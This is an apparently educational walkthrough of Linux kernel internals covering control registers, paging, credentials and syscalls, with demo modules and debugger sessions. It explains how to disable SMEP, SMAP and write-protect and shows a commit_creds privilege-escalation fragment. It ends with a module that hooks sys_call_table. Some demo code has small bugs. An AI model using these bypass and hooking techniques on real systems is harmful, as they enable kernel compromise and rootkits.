CR4: x32 and x64: #0: VME(Virtual-8086 Mode Extensions) #1: PVI(Protected Mode Virtual Interrupts) #2: TSD(Time Stamp Disable) #3: DE(Debugging Extensions) #4: PSE(Page Size Extensions) #5: PAE(Physical Address Extensions) #6: MCE(Machine Check Enable) #7: PGE(Page Global Enable) #8: PCE(Performance-Monitoring Counter Enable) #9: OSFXSR(OS Support for FXSAVE and FXRSTOR Instructions) #10: OSXMMEXCPT(OS Support for Unmasked SIMD Floating Point Exceptions) #11: UMIP(User-Mode Instruction Prevention) #12: Reserved #13: VMXE(Virtual Machine Extensions Enable) #14: SMXE(Safer Mode Extensions Enable) #15-16: Reserved #17: PCIDE(PCID Enable) #18: OSXSAVE(XSAVE and Processor Extended States Enable) #19: Reserved #20: SMEP(Supervisor Mode Execution Prevention) #21: SMAP(Supervisor Mode Access Prevention) #22-31: Reserved x64 only: #31-63: Reserved

CR1 and CR5 to CR7: Marked as reserved; accessing them raises an invalid opcode (#UD) exception.

x86_64 only: CR8: Only the first 4 bits are used in this one, while the other 60 bits are reserved (0). Also called the TPR (Task Priority Register). Those 4 bits are used when servicing interrupts, to check whether the task should really be interrupted. It may or may not be, depending on the interrupt's priority: (IP <= TP ? PASS : SERVICE).

These registers differ from one architecture to another; the example above covered two CISC targets (x86_32, x86_64), and Windows has much the same picture at this level. Things are a bit different on RISC (ARM, for this example): instead of Control Registers there are Coprocessors (P0 to P15), and each Coprocessor holds 16 registers (C0 to C15). Note, however, that only CP14 and CP15 are very important to the system. The MCR and MRC instructions are available to deal with data transfer (write/read).
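The original post illustrated this with the TTBR; as a stand-in sketch of my own (32-bit ARM assumed), the same read expressed as a C helper with inline assembly:

static inline unsigned long read_ttbr0(void)
{
	unsigned long ttbr0;

	/* CP15, c2, c0, 0 selects TTBR0 on AArch32; MCR with the same
	 * operands would write it instead. */
	asm volatile("mrc p15, 0, %0, c2, c0, 0" : "=r" (ttbr0));
	return ttbr0;
}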
An example is reading the TTBR (Translation Table Base Register), as sketched above.

SMAP:
Stands for Supervisor Mode Access Prevention; as its name suggests, it prevents access to user-space from a more privileged context, that is, ring zero. However, since access may still be necessary on certain occasions, a flag (AC in EFLAGS) is dedicated to this purpose, along with two instructions to set or clear it: STAC sets the flag and CLAC clears it.

static __init int setup_disable_smap(char *arg)
{
	setup_clear_cpu_cap(X86_FEATURE_SMAP);
	return 1;
}
__setup("nosmap", setup_disable_smap);

It can be disabled with the nosmap boot flag, which clears the CPU's SMAP capability, or by unsetting the SMAP bit (#21) in CR4.

SMEP:
An abbreviation for Supervisor Mode Execution Prevention: when running in ring zero, execution is not allowed to be transferred to user-space code. So both SMEP and SMAP put a form of limitation on the attacker's surface.

static __init int setup_disable_smep(char *arg)
{
	setup_clear_cpu_cap(X86_FEATURE_SMEP);
	check_mpx_erratum(&boot_cpu_data);
	return 1;
}
__setup("nosmep", setup_disable_smep);

Knowing whether it's on is as simple as checking /proc/cpuinfo, and it's the same for SMAP. This protection can be disabled with the nosmep boot flag; it can also be disabled at runtime by unsetting the SMEP bit (#20) in CR4.

Write-Protect:
Code executing at the highest level of privilege would normally be capable of writing to all pages, even those marked RO (Read Only). The WP bit (#16) in CR0 is supposed to stop that from happening by enforcing additional checks.

Paging (a bit of segmentation too):
Linux does separate privileges. The processor can handle up to 4 different rings, starting from 0, which obviously is the most privileged, and ending with 3, the least privileged, with limited access to system resources. However, most operating systems work with only two rings: zero (also called kernel-space) and three (or user-space). Each running process has a struct mm_struct which fully describes its virtual memory space. But when it comes to segmentation and paging, we're only interested in a few objects in this struct: context, the singly linked list mmap, and pgd.

typedef struct {
	u64 ctx_id;
	atomic64_t tlb_gen;
#ifdef CONFIG_MODIFY_LDT_SYSCALL
	struct rw_semaphore ldt_usr_sem;
	struct ldt_struct *ldt;
#endif
#ifdef CONFIG_X86_64
	unsigned short ia32_compat;
#endif
	struct mutex lock;
	void __user *vdso;
	const struct vdso_image *vdso_image;
	atomic_t perf_rdpmc_allowed;
#ifdef CONFIG_X86_INTEL_MEMORY_PROTECTION_KEYS
	u16 pkey_allocation_map;
	s16 execute_only_pkey;
#endif
#ifdef CONFIG_X86_INTEL_MPX
	void __user *bd_addr;
#endif
} mm_context_t;

This struct holds a lot of information on the context, including the Local Descriptor Table (LDT), the VDSO image and base address (residing in user-space, hence __user), a read/write semaphore and a mutual exclusion lock (it's a semaphore too, remember?).

struct ldt_struct {
	struct desc_struct *entries;
	unsigned int nr_entries;
	int slot;
};

The first element in the LDT is a desc_struct pointer, referencing an array of entries, nr_entries of them. However, know that the LDT isn't usually set up; the Global Descriptor Table alone is enough for most processes.
DEFINE_PER_CPU_PAGE_ALIGNED(struct gdt_page, gdt_page) = { .gdt = { #ifdef CONFIG_X86_64 [GDT_ENTRY_KERNEL32_CS] = GDT_ENTRY_INIT(0xc09b, 0, 0xfffff), [GDT_ENTRY_KERNEL_CS] = GDT_ENTRY_INIT(0xa09b, 0, 0xfffff), [GDT_ENTRY_KERNEL_DS] = GDT_ENTRY_INIT(0xc093, 0, 0xfffff), [GDT_ENTRY_DEFAULT_USER32_CS] = GDT_ENTRY_INIT(0xc0fb, 0, 0xfffff), [GDT_ENTRY_DEFAULT_USER_DS] = GDT_ENTRY_INIT(0xc0f3, 0, 0xfffff), [GDT_ENTRY_DEFAULT_USER_CS] = GDT_ENTRY_INIT(0xa0fb, 0, 0xfffff), #else [GDT_ENTRY_KERNEL_CS] = GDT_ENTRY_INIT(0xc09a, 0, 0xfffff), [GDT_ENTRY_KERNEL_DS] = GDT_ENTRY_INIT(0xc092, 0, 0xfffff), [GDT_ENTRY_DEFAULT_USER_CS] = GDT_ENTRY_INIT(0xc0fa, 0, 0xfffff), [GDT_ENTRY_DEFAULT_USER_DS] = GDT_ENTRY_INIT(0xc0f2, 0, 0xfffff), [GDT_ENTRY_PNPBIOS_CS32] = GDT_ENTRY_INIT(0x409a, 0, 0xffff), [GDT_ENTRY_PNPBIOS_CS16] = GDT_ENTRY_INIT(0x009a, 0, 0xffff), [GDT_ENTRY_PNPBIOS_DS] = GDT_ENTRY_INIT(0x0092, 0, 0xffff), [GDT_ENTRY_PNPBIOS_TS1] = GDT_ENTRY_INIT(0x0092, 0, 0), [GDT_ENTRY_PNPBIOS_TS2] = GDT_ENTRY_INIT(0x0092, 0, 0), [GDT_ENTRY_APMBIOS_BASE] = GDT_ENTRY_INIT(0x409a, 0, 0xffff), [GDT_ENTRY_APMBIOS_BASE+1] = GDT_ENTRY_INIT(0x009a, 0, 0xffff), [GDT_ENTRY_APMBIOS_BASE+2] = GDT_ENTRY_INIT(0x4092, 0, 0xffff), [GDT_ENTRY_ESPFIX_SS] = GDT_ENTRY_INIT(0xc092, 0, 0xfffff), [GDT_ENTRY_PERCPU] = GDT_ENTRY_INIT(0xc092, 0, 0xfffff), GDT_STACK_CANARY_INIT #endif } }; EXPORT_PER_CPU_SYMBOL_GPL(gdt_page); A per-cpu variable gdt_page is initialized using the GDT_ENTRY_INIT macro. #define GDT_ENTRY_INIT(flags, base, limit) \ { \ .limit0 = (u16) (limit), \ .limit1 = ((limit) >> 16) & 0x0F, \ .base0 = (u16) (base), \ .base1 = ((base) >> 16) & 0xFF, \ .base2 = ((base) >> 24) & 0xFF, \ .type = (flags & 0x0f), \ .s = (flags >> 4) & 0x01, \ .dpl = (flags >> 5) & 0x03, \ .p = (flags >> 7) & 0x01, \ .avl = (flags >> 12) & 0x01, \ .l = (flags >> 13) & 0x01, \ .d = (flags >> 14) & 0x01, \ .g = (flags >> 15) & 0x01, \ } This macro simply takes three arguments, and splits them in order to store at each field a valid value. The GDT holds more entries on 32bit than on 64bit. struct gdt_page { struct desc_struct gdt[GDT_ENTRIES]; } __attribute__((aligned(PAGE_SIZE))); Says that gdt_page is an array of GDT_ENTRIES(32 on x86_32, 16 on x86_64) much of desc_struct aligned to PAGE_SIZE(usually 4KB(4096)). struct desc_struct { u16 limit0; u16 base0; u16 base1: 8, type: 4, s: 1, dpl: 2, p: 1; u16 limit1: 4, avl: 1, l: 1, d: 1, g: 1, base2: 8; } __attribute__((packed)); When an ELF is about to run, and is being loaded with load_elf_binary(), it does call setup_new_exec(), install_exec_creds() on bprm before it calls setup_arg_pages() which would pick a random stack pointer. 
Before returning successfully, it would call finalize_exec() and start_thread() which would update the stack’s rlimit and begin execution respectively: void start_thread(struct pt_regs *regs, unsigned long new_ip, unsigned long new_sp) { start_thread_common(regs, new_ip, new_sp, __USER_CS, __USER_DS, 0); } EXPORT_SYMBOL_GPL(start_thread); As you are able to see, this function is just a wrapper around start_thread_common(): static void start_thread_common(struct pt_regs *regs, unsigned long new_ip, unsigned long new_sp, unsigned int _cs, unsigned int _ss, unsigned int _ds) { WARN_ON_ONCE(regs != current_pt_regs()); if (static_cpu_has(X86_BUG_NULL_SEG)) { loadsegment(fs, __USER_DS); load_gs_index(__USER_DS); } loadsegment(fs, 0); loadsegment(es, _ds); loadsegment(ds, _ds); load_gs_index(0); regs->ip = new_ip; regs->sp = new_sp; regs->cs = _cs; regs->ss = _ss; regs->flags = X86_EFLAGS_IF; force_iret(); } As a conclusion, every process starts with default segment registers, but different GPRs, stack and instruction pointer, and by looking at __USER_DS and __USER_CS: #define GDT_ENTRY_DEFAULT_USER_DS 5 #define GDT_ENTRY_DEFAULT_USER_CS 6 #define __USER_DS (GDT_ENTRY_DEFAULT_USER_DS*8 + 3) #define __USER_CS (GDT_ENTRY_DEFAULT_USER_CS*8 + 3) We would find the segment registers and their values on user-space: Initial state: CS = 6*8+3 = 0x33 SS = 5*8+3 = 0x2b DS = FS = ES = 0 These values can be checked using GDB and a dummy binary. (gdb) b* main Breakpoint 1 at 0x6b0 (gdb) r Starting program: /root/mod/cs Breakpoint 1, 0x00005555555546b0 in main () (gdb) info reg cs ss cs 0x33 51 ss 0x2b 43 Also, you should know that, CS holds in it’s least 2 significant bits, the Current Privilege Level(CPL), other segment selectors hold the Requested Privilege Level(RPL) instead of CPL. (gdb) p/t $cs $1 = 110011 (gdb) p/x $cs & 0b11 $2 = 0x3 # (Privilege Level: User(3) SuperUser(0)) (gdb) p/d $cs & ~0b1111 $3 = 48 # (Table Offset: 48) (gdb) p/d $cs & 0b100 $4 = 0 # (Table Indicator: GDT(0) LDT(1)) 3 stands for the third ring, least privileged, that is, user-space. It doesn’t change, unless the execution is in kernel-space, so it’s similiar for both root and any normal user. So both RPL and CPL could be considered a form of limitation when accessing segments with lower(more privileged) DPL(Descriptor Privilege Level). When it comes to paging, it’s equivalent bit in CR0(#31) is only set when the system is running in protected mode(PE bit in CR0 is set), because in real mode, virtual address are equal to physical ones. Linux moved from four-level page tables to support five-level page tables by adding an additional layer(P4D), so the levels now are: PGD P4D PUD PMD PTE. PGD is the first level Page Global Directory, it is a pointer of type pgd_t, and it’s definition is: typedef struct { pgdval_t pgd; } pgd_t; It holds a pgdval_t inside, which is an unsigned long(8 bytes on x86_64, 4 on x86_32😞 typedef unsigned long pgdval_t; To get to the next level, pagetable_l5_enabled() is called to check if the CPU has X86_FEATURE_LA57 enabled. #define pgtable_l5_enabled() cpu_feature_enabled(X86_FEATURE_LA57) This can be seen in p4d_offset(): static inline p4d_t *p4d_offset(pgd_t *pgd, unsigned long address) { if (!pgtable_l5_enabled()) return (p4d_t *)pgd; return (p4d_t *)pgd_page_vaddr(*pgd) + p4d_index(address); } If it isn’t enabled, it simply casts the pgd_t * as p4d_t * and returns it, otherwise it returns the P4D entry within the PGD that links to the specific address. 
Then P4D itself can be used to find the next level, which is PUD of type pud_t *, PUD links to PMD(Page Middle Directory) and PMD to the PTE(Page Table Entry) which is the last level, and contains the physical address of the page with some protection flags and is of type pte_t *. Each process has it’s own virtual space(mm_struct, vm_area_struct and pgd_t). struct vm_area_struct { unsigned long vm_start; unsigned long vm_end; struct vm_area_struct *vm_next, *vm_prev; struct rb_node vm_rb; unsigned long rb_subtree_gap; struct mm_struct *vm_mm; pgprot_t vm_page_prot; unsigned long vm_flags; struct { struct rb_node rb; unsigned long rb_subtree_last; } shared; struct list_head anon_vma_chain; struct anon_vma *anon_vma; const struct vm_operations_struct *vm_ops; unsigned long vm_pgoff; struct file * vm_file; void * vm_private_data; atomic_long_t swap_readahead_info; #ifndef CONFIG_MMU struct vm_region *vm_region; #endif #ifdef CONFIG_NUMA struct mempolicy *vm_policy; #endif struct vm_userfaultfd_ctx vm_userfaultfd_ctx; } __randomize_layout; typedef struct { pgdval_t pgd; } pgd_t; So creating a new process would be very expensive on performance. Copy-on-Write(COW) comes in helpful here, by making a clone out of the parent process and only copying when a write happens to the previously marked read-only pages. This happens on fork and more specifically in copy_process(), which duplicates the task_struct and does specific operations depending on flags passed to clone(), before copying all parent information which includes credentials, filesystem, files, namespaces, IO, Thread Local Storage, signal, address space. As an example, this walks VMAs in search of a user specified address, once found, it gets its Physical address and Flags by walking page tables. #include <linux/module.h> #include <linux/kernel.h> #include <linux/proc_fs.h> #include <linux/sched.h> #include <linux/uaccess.h> #include <asm/pgtable.h> #include <linux/highmem.h> #include <linux/slab.h> #define device_name "useless" #define SET_ADDRESS 0x00112233 char *us_buf; unsigned long address = 0; long do_ioctl(struct file *filp, unsigned int cmd, unsigned long arg){ switch(cmd){ case SET_ADDRESS: address = arg; return 0; default: return -EINVAL; } } ssize_t do_read(struct file *filp, char *buf, size_t count, loff_t *offp){ int res, phys, flags; struct vm_area_struct *cmap; pgd_t *pgd; p4d_t *p4d; pud_t *pud; pmd_t *pmd; pte_t *ptep; /* Find corresponding VMA */ cmap = current->mm->mmap; while(1){ if(cmap->vm_start >= address && address < cmap->vm_end){ break; } cmap = cmap->vm_next; if(cmap == NULL){ return -1; } }; /* Walking Page-tables for fun */ pgd = pgd_offset(current->mm, address); p4d = p4d_offset(pgd, address); pud = pud_offset(p4d, address); pmd = pmd_offset(pud, address); ptep = pte_offset_kernel(pmd, address); phys = *((int *) ptep); flags = phys & 0xfff; phys &= ~0xfff; snprintf(us_buf, 64, "PhysAddr(%x) VMAStart(%lx) Flags(%x)", phys, cmap->vm_start, flags); if(count > 64) count = 64; res = copy_to_user(buf, us_buf, count); return res; } struct file_operations fileops = { .owner = THIS_MODULE, .read = do_read, .unlocked_ioctl = do_ioctl, }; static int us_init(void){ struct proc_dir_entry *res; us_buf = kmalloc(64, GFP_KERNEL); if(us_buf == NULL){ printk(KERN_ERR "Couldn't reserve memory."); return -ENOMEM; } res = proc_create(device_name, 0, NULL, &fileops); if(res == NULL){ printk(KERN_ERR "Failed allocating a proc entry."); return -ENOMEM; } return 0; } static void us_exit(void){ remove_proc_entry(device_name, NULL); 
kfree(us_buf); } MODULE_LICENSE("GPU"); module_init(us_init); module_exit(us_exit); To communicate with this proc entry, the following was written: #include <stdio.h> #include <string.h> #include <stdlib.h> #include <fcntl.h> #include <unistd.h> #include <sys/ioctl.h> #define device_path "/proc/useless" #define SET_ADDRESS 0x00112233 void main(void){ int fd; char *ok; char c[64]; fd = open(device_path, O_RDONLY); ok = malloc(512); memcpy(ok, "Welp", sizeof(int )); ioctl(fd, SET_ADDRESS, ok); read(fd, c, sizeof( c)); printf("%s\n", &c); } This gives: 0x867 in binary is: 100001100111. Present: 1 (The page is present) R/W: 1 (The page have both read and write permissions) U/S: 1 (The page can be accessed by the user and supervisor) 00 Accessed: 1 (Set if the page had been accessed) Dirty: 1 (Set if the page was written to since last writeback) 0000 Note that necessary checks on validity of return values was ignored in this example, these could be performed with p??_none() and p??_present(), and multiple other things could have been done, such as playing with the PFN or page or reading from the Physical Address with void __iomem *, ioremap() and memcpy_fromio() or struct page * and kmap(). Translating address from virtual to physical takes time, so caching is implemented using the TLB(Translation Lookaside Buffer) to improve the performance, hopefully that the next access is going to land a cache-hit and that’ll hand the PTE faster than a miss where a memory access is forced to happen to get it. The TLB flushes from time to another, an example would be after a page fault is raised and completed. Processes: The kernel sees each process as a struct task_struct which is a huge struct that contains many fields which we can’t cover entirely, some are used to guarantee the (almost) fair scheduling and some show the task’s state(if it’s either unrunnable, runnable or stopped), priority, the parent process, a linked list of children processes, the address space it holds, and many others. We are mainly interested in the const struct cred __rcu *cred; which holds the task’s credentials. struct cred { atomic_t usage; #ifdef CONFIG_DEBUG_CREDENTIALS atomic_t subscribers; void *put_addr; unsigned magic; #define CRED_MAGIC 0x43736564 #define CRED_MAGIC_DEAD 0x44656144 #endif kuid_t uid; kgid_t gid; kuid_t suid; kgid_t sgid; kuid_t euid; kgid_t egid; kuid_t fsuid; kgid_t fsgid; unsigned securebits; kernel_cap_t cap_inheritable; kernel_cap_t cap_permitted; kernel_cap_t cap_effective; kernel_cap_t cap_bset; kernel_cap_t cap_ambient; #ifdef CONFIG_KEYS unsigned char jit_keyring; struct key __rcu *session_keyring; struct key *process_keyring; struct key *thread_keyring; struct key *request_key_auth; #endif #ifdef CONFIG_SECURITY void *security; #endif struct user_struct *user; struct user_namespace *user_ns; struct group_info *group_info; struct rcu_head rcu; } __randomize_layout; This struct holds Capabilities, ((effective) user and group) ID, keyrings, (for synchronization, Read-Copy-Update) RCU, (tracks the user’s usage of the system by keeping counts) user and (holds U/G ID and the privileges for them) user_ns. In order to better understand this structure, a simple proc entry was created which extracts the task_struct of the process that uses it(current) and reads the effective UID and GID. 
#include <linux/module.h> #include <linux/kernel.h> #include <linux/proc_fs.h> #include <linux/sched.h> #include <linux/uaccess.h> #include <linux/cred.h> #include <linux/uidgid.h> #define device_name "useless" #define SD_PRIV 0x10071007 struct{ kuid_t ceuid; kgid_t cegid; spinlock_t clock; }us_cd; long do_ioctl(struct file *filp, unsigned int cmd, unsigned long arg){ int res; switch(cmd){ case SD_PRIV: spin_lock(&us_cd.clock); current_euid_egid(&us_cd.ceuid, &us_cd.cegid); spin_unlock(&us_cd.clock); res = copy_to_user((void *)arg, &us_cd, 8); return res; default: return -EINVAL; } } struct file_operations fileops = { .owner = THIS_MODULE, .unlocked_ioctl = do_ioctl, }; static int us_init(void){ struct proc_dir_entry *res; spin_lock_init(&us_cd.clock); res = proc_create(device_name, 0, NULL, &fileops); if(res == NULL){ printk(KERN_ERR "Failed allocating a proc entry."); return -ENOMEM; } return 0; } static void us_exit(void){ remove_proc_entry(device_name, NULL); } MODULE_LICENSE("GPU"); module_init(us_init); module_exit(us_exit); The initialization process starts by preparing the spinlock and creating a proc entry with a specified name “useless” and a file_operations struct containing only necessary owner and unlocked_ioctl entries. While the ioctl handler simply checks if the command passed was SD_PRIV to extract the UID and GID with a call to the current_euid_egid() macro which in turn calls current_cred() to extract the current->cred: #define current_euid_egid(_euid, _egid) \ do { \ const struct cred *__cred; \ __cred = current_cred(); \ *(_euid) = __cred->euid; \ *(_egid) = __cred->egid; \ } while(0) #define current_cred() \ rcu_dereference_protected(current->cred, 1) Then, we create a tasktry.c to interract with the /proc/useless. #include <stdio.h> #include <string.h> #include <stdlib.h> #include <fcntl.h> #include <unistd.h> #include <sys/ioctl.h> #define device_path "/proc/useless" #define SD_PRIV 0x10071007 struct{ unsigned int uid; unsigned int gid; }data; void main(void){ int fd; fd = open(device_path, O_RDONLY); ioctl(fd, SD_PRIV, &data); printf("UID: %d GID: %d\n", data.uid, data.gid); } Two binaries are then created in /tmp directory, one which is compiled by root(setuid bit set) tasktry_root and the other by a normal user called tasktry_user. root@Nwwz:~# cd /tmp root@Nwwz:/tmp# gcc tasktry.c -o tasktry_root; chmod u+s tasktry_root root@Nwwz:/tmp# cd /root/mod root@Nwwz:~/mod# make make -c /lib/modules/4.17.0/build M=/root/mod modules make[1]: Entering directory '/usr/src/linux-4.17.2' CC [M] /root/mod/task.o Building modules, stage 2. MODPOST 1 modules CC /root/mod/task.mod.o LD [M] /root/mod/task.ko make[1]: Leaving directory '/usr/src/linux-4.17.2' root@Nwwz:~/mod# insmod task.ko root@Nwwz:~/mod# su - user user@Nwwz:~$ cd /tmp user@Nwwz:/tmp$ gcc tasktry.c -o tasktry_user user@Nwwz:/tmp$ ls tasktry_user tasktry_root tasktry.c user@Nwwz:/tmp$ ./tasktry_root UID: 0 GID: 1000 user@Nwwz:/tmp$ ./tasktry_user UID: 1000 GID: 1000 As you can see, the effective UID of tasktry_root is 0 making it own high privileges, so overwritting effective creds is one way to privilege escalation(prepare_kernel_creds() and commit_creds() are used for this purpose in most exploits, instead of getting the stack base and overwritting it directly.), another is to change capabilities. 
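For reference, the pattern those exploits use is tiny. This is a hedged sketch of my own (a kernel-context payload fragment, not a working exploit): it has to run in ring zero, typically via a hijacked function pointer, and simply applies a freshly built root cred set to the calling task.

#include <linux/cred.h>
#include <linux/sched.h>

/* Build full-root credentials (prepare_kernel_cred(NULL) bases them on
 * init_cred) and install them on the current task. */
static void escalate_current_task(void)
{
	commit_creds(prepare_kernel_cred(NULL));
}

After this runs, the current process has UID/GID 0 and full capabilities; from user-space the exploit usually just execs a shell afterwards.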
On Windows, one way to escalate privileges would be to steal the token of System process(ID 4) and assign it to the newly spawned cmd.exe after changing the reference count: image.png910x355 33.2 KB Syscalls: Processes running in userspace can still communicate with the kernel, thanks to syscalls. Each syscall is defined as follows: SYSCALL_DEFINE0(getpid) { return task_tgid_vnr(current); } With multiple arguments: SYSCALL_DEFINE3(lseek, unsigned int, fd, off_t, offset, unsigned int, whence) { return ksys_lseek(fd, offset, whence); } So, in general: SYSCALL_DEFINE[ARG_COUNT]([SYSCALL_NAME], [ARG_TYPE], [ARG_NAME]){ /* Passing the argument to another function, for processing. */ return call_me([ARG_NAME]); } Few tries aaand : #include <stdio.h> #include <string.h> #include <unistd.h> int main(void){ printf("ID: %d\n", getuid()); return 0; } Running this sample with GDB and putting breakpoint on the x64 libc, we can see that it does set EAX register to 0x66(syscall number on x64) before the syscall instruction. (gdb) x/i $rip => 0x555555554704 <main+4>: callq 0x5555555545a0 <getuid@plt> (gdb) x/x getuid 0x7ffff7af2f30 <getuid>: 0x000066b8 (gdb) b* getuid Breakpoint 2 at 0x7ffff7af2f30: file ../sysdeps/unix/syscall-template.S, line 65. (gdb) c Continuing. Breakpoint 2, getuid () at ../sysdeps/unix/syscall-template.S:65 65 ../sysdeps/unix/syscall-template.S: No such file or directory. (gdb) disas $rip Dump of assembler code for function getuid: => 0x00007ffff7af2f30 <+0>: mov $0x66,%eax 0x00007ffff7af2f35 <+5>: syscall 0x00007ffff7af2f37 <+7>: retq End of assembler dump. (gdb) shell root@Nwwz:~# echo "g" > /proc/sysrq-trigger We can invoke a shell from GDB to force SysRQ, and see what this offset in the kernel links for: [New Thread 756] [New Thread 883] [New Thread 885] Thread 103 received signal SIGTRAP, Trace/breakpoint trap. [Switching to Thread 889] kgdb_breakpoint () at kernel/debug/debug_core.c:1073 10733 wmb(); /* Sync point after breakpoint */ (gdb) p &sys_call_table $1 = (const sys_call_ptr_t (*)[]) 0xffffffff81c00160 <sys_call_table> (gdb) x/gx (void *)$1 + 0x66*8 0xffffffff81c00490 <sys_call_table+816>: 0xffffffff8108ec60 (gdb) x/i 0xffffffff8108ec60 0xffffffff8108ec60 <__x64_sys_getuid>: nopl 0x0(%rax,%rax,1) So, it’s the global sys_call_table, indexing the __x64_sys_getuid there. "The __x64_sys_*() stubs are created on-the-fly for sys_*() system calls" is written in syscall_64.tbl that contains all the syscalls available to the kernel. This is similiar to the nt!KiServiceTable on Windows. 
kd> dps nt!KeServiceDescriptorTable 82b759c0 82a89d9c nt!KiServiceTable 82b759c4 00000000 82b759c8 00000191 82b759cc 82a8a3e4 nt!KiArgumentTable 82b759d0 00000000 82b759d4 00000000 kd> dd nt!KiServiceTable 82a89d9c 82c85c28 82acc40d 82c15b68 82a3088a 82a89dac 82c874ff 82b093fa 82cf7b05 82cf7b4e 82a89dbc 82c0a3bd 82d11368 82d125c1 82c00b95 kd> ln 82c85c28 (82c85c28) nt!NtAcceptConnectPort | (82c85ca5) nt!EtwpRundownNotifications Exact matches: nt!NtAcceptConnectPort = <no type information> kd> ln 82acc40d (82acc40d) nt!NtAccessCheck | (82acc43e) nt!PsGetThreadId Exact matches: nt!NtAccessCheck = <no type information> kd> ln 82d125c1 (82d125c1) nt!NtAddDriverEntry | (82d125f3) nt!NtDeleteDriverEntry Exact matches: nt!NtAddDriverEntry = <no type information> Dissasembling it gives us: (gdb) disas __x64_sys_getuid Dump of assembler code for function __x64_sys_getuid: 0xffffffff8108ec60 <+0>: nopl 0x0(%rax,%rax,1) 0xffffffff8108ec65 <+5>: mov %gs:0x15c00,%rax 0xffffffff8108ec6e <+14>: mov 0x668(%rax),%rax 0xffffffff8108ec75 <+21>: mov 0x4(%rax),%esi 0xffffffff8108ec78 <+24>: mov 0x88(%rax),%rdi 0xffffffff8108ec7f <+31>: callq 0xffffffff8112d4a0 <from_kuid_munged> 0xffffffff8108ec84 <+36>: mov %eax,%eax 0xffffffff8108ec86 <+38>: retq With a basic understanding of ASM and a very limited knowledge of the kernel (AT&T haha, too lazy to switch the syntax .), one can know that it does first search for the current task, store some pointer it holds at offset 0x668 at RAX before dereferencing it again and using content at +0x88(RDI) and +0x4(RSI) as arguments to the from_kuid_munged call before it nops and returns(q there stands for qword). We can verify this either by looking at the source: SYSCALL_DEFINE0(getuid) { return from_kuid_munged(current_user_ns(), current_uid()); } uid_t from_kuid_munged(struct user_namespace *targ, kuid_t kuid) { uid_t uid; uid = from_kuid(targ, kuid); if (uid == (uid_t) -1) uid = overflowuid; return uid; } EXPORT_SYMBOL(from_kuid_munged); Or checking in GDB(maybe both?😞 (gdb) b* __x64_sys_getuid Breakpoint 1 at 0xffffffff8108ec60: file kernel/sys.c, line 920. (gdb) c [New Thread 938] [Switching to Thread 938] Thread 122 hit Breakpoint 1, __x64_sys_getuid () at kernel/sys.c:920 920 { (gdb) ni get_current () at ./arch/x86/include/asm/current.h:15 15 return this_cpu_read_stable(current_task); (gdb) x/i $rip => 0xffffffff8108ec65 <__x64_sys_getuid+5>: mov %gs:0x15c00,%rax (gdb) p ((struct task_struct *)0)->cred Cannot access memory at address 0x668 (gdb) p ((struct cred *)0)->uid Cannot access memory at address 0x4 (gdb) p ((struct cred *)0)->user_ns Cannot access memory at address 0x88 The sys_call_table is residing in a RO(read only) memory space: (gdb) x/x sys_call_table 0xffffffff81c00160 <sys_call_table>: 0xffffffff81247310 (gdb) maintenance info sections ... [3] 0xffffffff81c00000->0xffffffff81ec1a42 at 0x00e00000: .rodata ALLOC LOAD RELOC DATA HAS_CONTENTS ... (gdb) But a kernel module can overcome this protection and place a hook at any systemcall. For that, two example modules will be given: =] Disabling the previously discussed WP(write-protect) bit in the CR0(control register #0), using read_cr0 and write_cr0 to acheive that. 
#include <linux/fs.h>
#include <asm/pgtable.h>
#include <linux/module.h>
#include <linux/kernel.h>
#include <linux/uaccess.h>
#include <linux/kallsyms.h>
#include <linux/miscdevice.h>
#include <asm/special_insns.h>

#define device_name "hookcontrol"
#define ioctl_base 0x005ec
#define ioctl_enable ioctl_base+1
#define ioctl_disable ioctl_base+2

int res;
int (*real_getuid)(void);
void **sys_call_table;
unsigned long const *address;

static int hooked_getuid(void){
    printk(KERN_INFO "Received getuid call from %s!", current->comm);
    if(real_getuid != NULL){
        return real_getuid();
    }
    return 0;
}

long do_ioctl(struct file *filp, unsigned int cmd, unsigned long arg){
    unsigned long cr0 = read_cr0();
    switch(cmd){
        case ioctl_enable:
            printk(KERN_INFO "Enabling hook!");
            write_cr0(cr0 & ~0x10000);
            sys_call_table[__NR_getuid] = hooked_getuid;
            write_cr0(cr0 | 0x10000);
            printk(KERN_INFO "Successfully changed!");
            return 0;
        case ioctl_disable:
            printk(KERN_INFO "Disabling hook!");
            write_cr0(cr0 & ~0x10000);
            sys_call_table[__NR_getuid] = real_getuid;
            write_cr0(cr0 | 0x10000);
            printk(KERN_INFO "Successfully restored!");
            return 0;
        default:
            return -EINVAL;
    }
}

struct file_operations file_ops = {
    .owner = THIS_MODULE,
    .unlocked_ioctl = do_ioctl
};

struct miscdevice hk_dev = {
    MISC_DYNAMIC_MINOR,
    device_name,
    &file_ops
};

static int us_init(void){
    res = misc_register(&hk_dev);
    if(res){
        printk(KERN_ERR "Couldn't load module!");
        return -1;
    }
    sys_call_table = (void *) kallsyms_lookup_name("sys_call_table");
    real_getuid = sys_call_table[__NR_getuid];
    address = (unsigned long *) &sys_call_table;
    printk(KERN_INFO "Module successfully loaded with minor: %d!", hk_dev.minor);
    return 0;
}

static void us_exit(void){
    misc_deregister(&hk_dev);
}

MODULE_LICENSE("GPL");
module_init(us_init);
module_exit(us_exit);

=] OR'ing _PAGE_RW into the protection mask of the page where the table resides (__pgprot(_PAGE_RW), as set_memory_rw()/set_memory_ro() do), or directly modifying the PTE.

static inline pte_t pte_mkwrite(pte_t pte)
{
    return pte_set_flags(pte, _PAGE_RW);
}

static inline pte_t pte_wrprotect(pte_t pte)
{
    return pte_clear_flags(pte, _PAGE_RW);
}

Looking at these functions, one can safely assume that the manipulation can be achieved with simple OR and AND (~_PAGE_RW) operations on the pte_t.

pte_t *lookup_address(unsigned long address, unsigned int *level)
{
    return lookup_address_in_pgd(pgd_offset_k(address), address, level);
}

Since it's a kernel address, pgd_offset_k() is called, which makes use of &init_mm instead of a mm_struct belonging to some process of one's choice.
pte_t *lookup_address_in_pgd(pgd_t *pgd, unsigned long address, unsigned int *level)
{
    p4d_t *p4d;
    pud_t *pud;
    pmd_t *pmd;

    *level = PG_LEVEL_NONE;

    if (pgd_none(*pgd))
        return NULL;

    p4d = p4d_offset(pgd, address);
    if (p4d_none(*p4d))
        return NULL;

    *level = PG_LEVEL_512G;
    if (p4d_large(*p4d) || !p4d_present(*p4d))
        return (pte_t *)p4d;

    pud = pud_offset(p4d, address);
    if (pud_none(*pud))
        return NULL;

    *level = PG_LEVEL_1G;
    if (pud_large(*pud) || !pud_present(*pud))
        return (pte_t *)pud;

